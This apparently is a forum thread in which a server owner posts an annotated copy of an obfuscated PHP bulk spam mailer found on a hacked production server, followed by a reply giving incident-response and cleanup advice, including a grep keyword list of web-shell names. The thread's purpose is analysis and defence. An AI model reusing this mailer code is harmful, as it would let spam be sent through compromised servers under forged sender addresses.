
Production Server Hacked


C0NFUS3D


I've received several alerts about one of my production servers... It was sending thousands of spam emails. I figured someone had got hold of the account password, so I changed them all... but it was still happening. I found a rogue PHP file in the root directory of one of the websites... It could have [possibly] been put there by some kind of injection, or with the account password as I originally thought. Not sure, but check it out!

<?php

// --- Analyst annotation (sample as found on the compromised host; code left unchanged) ---
// Top-level script: a POST-driven bulk mailer. Identifiers are hashed (vXXXXXXXX / nXXXXXXXX),
// literal strings are assembled with chr(), and diagnostics are switched off first thing —
// the usual anti-analysis tells for this family.
// Detection points that are grounded in the code below:
//   * fixed responses: PHP_OS followed by "10+"/"11+"/"20+" and md5() of a constant,
//     and "OK" followed by md5() of a constant and "+0"/"+1";
//   * outbound TCP/25 from the web tier (n7b0ecdff) and MX lookups (n9c812bad);
//   * a From:/Reply-To: header forged from the request's own HTTP_HOST.
// Silence all diagnostics so failures leave nothing in the error log.
@error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
// Fewer than two POST fields -> "<OS>10+<md5>" banner and exit (a probe/heartbeat response).
if (count($_POST) < 2) {
die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321));
}
// Set when a POST key starting with 'e' is present: enables the extra decode layer below.
$v5031e998 = false;
// Field roles are chosen by the FIRST CHARACTER of each POST key, not by a fixed name,
// so signatures should not key on parameter names (chr(108)='l', 100='d', 109='m', 101='e').
foreach (array_keys($_POST) as $v3c6e0b8a) {
switch ($v3c6e0b8a[0]) {
case chr(108): // 'l' -> key holding the recipient list
$vd56b6998 = $v3c6e0b8a;
break;
case chr(100): // 'd' -> key holding the message template (<USER>/<NAME>/<SUBJ>/<SBODY>)
$v8d777f38 = $v3c6e0b8a;
break;
case chr(109): // 'm' -> key holding an explicit SMTP host (optional)
$v3d26b0b1 = $v3c6e0b8a;
break;
case chr(101); // 'e' -> flag: payload values are base64 + XOR-2 encoded (n9a2d8ce3)
$v5031e998 = true;
break;
}
}
// Empty list/template key -> "<OS>11+<md5>" banner.
if ($vd56b6998 === '' || $v8d777f38 === '')
die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));
// Capability probe: parse disable_functions to decide between mail() and raw sockets later.
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
// Fetch the three payload values by the keys discovered above.
$v01b6e203 = @$_POST[$vd56b6998];
$v8d777f38 = @$_POST[$v8d777f38];
$v3d26b0b1 = @$_POST[$v3d26b0b1];
// Optional obfuscation layer on the payload itself.
if ($v5031e998) {
$v01b6e203 = n9a2d8ce3($v01b6e203);
$v8d777f38 = n9a2d8ce3($v8d777f38);
$v3d26b0b1 = n9a2d8ce3($v3d26b0b1);
}
// Final unwrapping of the payload values.
$v01b6e203 = urldecode(stripslashes($v01b6e203));
$v8d777f38 = urldecode(stripslashes($v8d777f38));
$v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
// Recipient list is '#'-separated; a single address becomes a one-element list.
if (strpos($v01b6e203, '#', 1) != false) {
$v16a9b63f = preg_split('/#/', $v01b6e203);
$ve2942a04 = count($v16a9b63f);
} else {
$v16a9b63f[0] = $v01b6e203;
$ve2942a04 = 1;
}
// One delivery attempt per recipient.
for ($v865c0c0b = 0; $v865c0c0b < $ve2942a04; $v865c0c0b++) {
$v01b6e203 = $v16a9b63f[$v865c0c0b];
// Skip blanks and anything without an '@'.
if ($v01b6e203 == '' || !strpos($v01b6e203, '@', 1))
continue;
// "first;last;address" form -> display name from the first two fields; otherwise a bare address.
// $v3a5939e4 ends up as the recipient's domain (the part after '@'), used for the MX lookup.
if (strpos($v01b6e203, ';', 1) != false) {
list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/', strtolower($v01b6e203));
$va3da707b = ucfirst($va3da707b);
$vbfbb12dc = ucfirst($vbfbb12dc);
$v3a5939e4 = next(explode('@', $v081bde0c));
if ($vbfbb12dc == '' || $va3da707b == '') {
$vbfbb12dc = $va3da707b = '';
$v01b6e203 = $v081bde0c;
} else {
$v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>";
}
} else {
$vbfbb12dc = $va3da707b = '';
$v081bde0c = strtolower($v01b6e203);
$v3a5939e4 = next(explode('@', $v01b6e203));
}
// Pull the template fields out of the 'd' payload.
preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1);
$vee11cbb1 = $vee11cbb1[1];
preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c);
$vb068931c = $vb068931c[1];
preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9);
$vc34487c9 = $vc34487c9[1];
preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42);
$v6f4b5f42 = $v6f4b5f42[1];
// Per-recipient personalisation placeholders in subject and body.
$vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9);
$vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9);
$v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42);
$v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42);
// Sender domain is forged from the compromised host's own HTTP_HOST (www./ftp. stripped).
$v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
// The -f envelope sender is only passed when HTTP_HOST is not a bare IPv4 (ne667da76) and safe_mode is off.
if (ne667da76($v0897acf4) || @ini_get('safe_mode'))
$v10497e3f = false;
else
$v10497e3f = true;
// From address = <USER>@<this host>, display name from <NAME>.
$v9a5cb5d8 = "$vee11cbb1@$v0897acf4";
if ($vb068931c != '')
$vd98a07f8 = "$vb068931c <$v9a5cb5d8>";
else
$vd98a07f8 = $v9a5cb5d8;
// Headers: HTML body, iso-8859-1, 8bit.
$vb8ddc93f = "From: $vd98a07f8\r\n";
$vb8ddc93f .= "Reply-To: $vd98a07f8\r\n";
$v3c87b187 = "X-Priority: 3 (Normal)\r\n";
$v3c87b187 .= "MIME-Version: 1.0\r\n";
$v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
$v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n";
// Preferred path: PHP mail() when it is not disabled. Success prints "OK<md5>+0".
if (!in_array('mail', $v619d75f8)) {
if ($v10497e3f) {
if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f . $v3c87b187, "-f$v9a5cb5d8")) {
echo (chr(79) . chr(75) . md5(1234567890) . "+0\n");
continue;
}
} else {
if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) {
echo (chr(79) . chr(75) . md5(1234567890) . "+0\n");
continue;
}
}
}
// Fallback path: compose a full message (Date/From/Message-ID/To/Subject) for direct SMTP delivery.
$v4340fd73 = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $vb8ddc93f;
$v4340fd73 .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$v0897acf4>\r\n";
$v4340fd73 .= "To: $v01b6e203\r\n";
$v4340fd73 .= "Subject: $vc34487c9\r\n";
$v4340fd73 .= $v3c87b187;
$v841a2d68 = $v4340fd73 . "\r\n" . $v6f4b5f42;
// No SMTP host supplied -> use the recipient domain's MX (n9c812bad; falls back to 127.0.0.1).
if ($v3d26b0b1 == '')
$v3d26b0b1 = n9c812bad($v3a5939e4);
// Direct SMTP: 0 -> "OK<md5>+1"; anything else -> "<OS>20+<md5>+<n7b0ecdff result>".
if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) {
echo (chr(79) . chr(75) . md5(1234567890) . "+1\n");
continue;
} else {
echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$vb4a88417\n";
}
}
// Returns non-zero when $v957b527b is a dotted-quad IPv4 literal (first octet 1-255,
// remaining octets 0-255). The caller uses it to decide whether HTTP_HOST looks like a
// hostname that can serve as the forged sender domain.
function ne667da76($v957b527b)
{
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b);
}
// Quoted-printable-style encoder. Bytes equal to '=' (0x3D), >= 0x80 or < 0x20 are emitted
// as "=XX" (upper-case hex); a soft break $v7fa1b685 (default "=\r\n") is inserted once the
// column counter $v11a95b8a reaches 75, after which the counter restarts at $v92f21a0f.
// When $v3303c65a is false, CR/LF pass through raw and reset the column counter.
// Not called anywhere in this listing as posted.
function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685 = "=\r\n", $v92f21a0f = 0, $v3303c65a = false)
{
$vf5a8e923 = strlen($vb45cffe0);
$vb4a88417 = '';
for ($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) {
// Soft line break once the line is full.
if ($v11a95b8a >= 75) {
$v11a95b8a = $v92f21a0f;
$vb4a88417 .= $v7fa1b685;
}
$v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]);
if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
// Raw CR/LF are kept verbatim unless the caller asked for them to be encoded too.
if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
$vb4a88417 .= chr($v4a8a08f0);
$v11a95b8a = 0;
continue;
}
$vb4a88417 .= '=' . str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
$v11a95b8a += 3;
continue;
}
$vb4a88417 .= chr($v4a8a08f0);
$v11a95b8a++;
}
return $vb4a88417;
}
// Minimal SMTP client used when mail() is unavailable: connects to $v3d26b0b1:25 (20 s
// timeout) with whichever of fsockopen/pfsockopen is not listed in disable_functions,
// then walks EHLO / MAIL FROM / RCPT TO / DATA / QUIT, reading each reply via n54070395.
// Return values: 0 = accepted; 1 = connect failed; -1 = no usable socket function;
// otherwise a string "<step>+(<recipient>)+<server reply, newlines replaced by '|'>".
// Detection: unsolicited outbound TCP/25 from the web tier, EHLO carrying this host's HTTP_HOST.
// NOTE: as transcribed, the stream_socket_client `elseif` has no statement body, so the
// listing is not syntactically complete as posted.
function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1)
{
// $v619d75f8 is the parsed disable_functions list from the top-level script.
global $v619d75f8;
if (!in_array('fsockopen', $v619d75f8))
$v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
elseif (!in_array('pfsockopen', $v619d75f8))
$v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client"))
else
return -1;
if (!$v66b18866) {
return 1;
} else {
// Consume the server greeting before speaking.
$v8d777f38 = n54070395($v66b18866);
@fputs($v66b18866, "EHLO $v0897acf4\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250)
return "2+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250)
return "3+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251)
return "4+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "DATA\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 354)
return "5+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
// Message body followed by the SMTP end-of-data marker.
@fputs($v66b18866, $v841a2d68 . "\r\n.\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250)
return "6+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "QUIT\r\n");
@fclose($v66b18866);
return 0;
}
}
// Reads one (possibly multi-line) SMTP reply from the socket: lines are accumulated until
// one has a space in the fourth position ("250 " terminator rather than "250-" continuation).
function n54070395($v66b18866)
{
$v8d777f38 = '';
while ($v341be97d = @fgets($v66b18866, 4096)) {
$v8d777f38 .= $v341be97d;
if (substr($v341be97d, 3, 1) == ' ')
break;
}
return $v8d777f38;
}
// Resolves the lowest-preference MX host for the domain $vad5f82e8 via getmxrr() when that
// function is neither disabled nor missing. Returns '127.0.0.1' if getmxrr is unavailable or
// no MX record comes back. Bursts of MX queries from a web server are themselves an indicator.
function n9c812bad($vad5f82e8)
{
// $v619d75f8 is the parsed disable_functions list from the top-level script.
global $v619d75f8;
if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) {
@getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
if (count($v744fa43b) === 0)
return '127.0.0.1';
// Pick the host whose weight equals the smallest weight returned.
$v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816));
return $v744fa43b[$v865c0c0b[0]];
} else {
return '127.0.0.1';
}
}
// Decodes the optional payload layer selected by the 'e' POST key: base64-decode, then XOR
// every byte with 2. A trivial, reversible transform — obfuscation, not encryption — and a
// usable signature (base64_decode feeding a per-byte chr(ord(...) ^ N) loop).
function n9a2d8ce3($v1cb251ec)
{
$v1cb251ec = base64_decode($v1cb251ec);
$vc68271a6 = '';
for ($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++)
$vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2);
return $vc68271a6;
}
?>

--- edit ----

the code wrappers were messing up here

Edited by c0nfus3d1

Ouch. Check for SQL injection and XSS points in your site and patch them, otherwise the attacker will be right back in. Also check your backups and make sure they are not compromised.



Get Wireshark running on the server if you have it, or tcpdump, and monitor the traffic; also run netstat -antp and netstat -anup and check for established connections to your server that seem persistent at all times. If compromised and someone has a backdoor or bot running, it will most likely keep a connection bound to the server. Also check /tmp for any rogue files, and ps -Af for fake processes named like apache or httpd that are in fact shell scripts or back doors. Lots of bots will start fake processes under the name of a normal program, which makes them hard to track down, but usually the owner tied to the process can help if you can show where the process was started from / the path it lives in. I would also suggest looking at all your .htaccess files in case they added MIME types to make regular files like GIFs run as PHP, etc., which can allow something that looks as benign as an image to actually be a shell. Do a quick grep of the www-readable side or public html path (since they often connect on this side of the fence) for things like c99, xcrew, byroe, edited by, shell, shellexec, base64_decode and the like; if any of these show up in files, investigate and remove quickly. Once you identify connections and files, take the server offline, image it for forensics and later analysis, then back up important files (make sure they are clean) and reinstall fresh (the only way to be sure they are gone). If on shared hosting, notify the host, or move to a VPS. If you have cPanel, check all cPanel directories and the email files in those directories, as a lot of scripts call home and send emails back to bot owners, leaving a trail and logs, and often create hidden subdomains on your server — e.g. for the site www.acme.com, they might create flickr.com.acme.com or something similar. Check all startup files and do a reboot before moving to a clean install, to see what starts, from where, and what calls home after boot.
If you have physical access to the machine, might even be nice to port mirror it to capture traffic without them knowing so you can see who is on.

With the netstat output, you will usually see established sockets and ones listening on ports you normally don't have services associated with, so be sure to investigate those. lsof, I believe, also has command switches to show where the processes live / the paths of the connected sockets, so you can kill the file and the connections.

If you run a PHP-based site, you can also put some code in the header file (or whatever file is used across the whole site) and look for file upload attempts.

I tried posting some code here, but forums keep removing it. PM me if you want a copy of the code. I really don't want it public anyway, since its part of a product in development, but willing to let you use part of it to help log file upload attempts and POST data sent at the domain.

- DigiP

Edited by digip
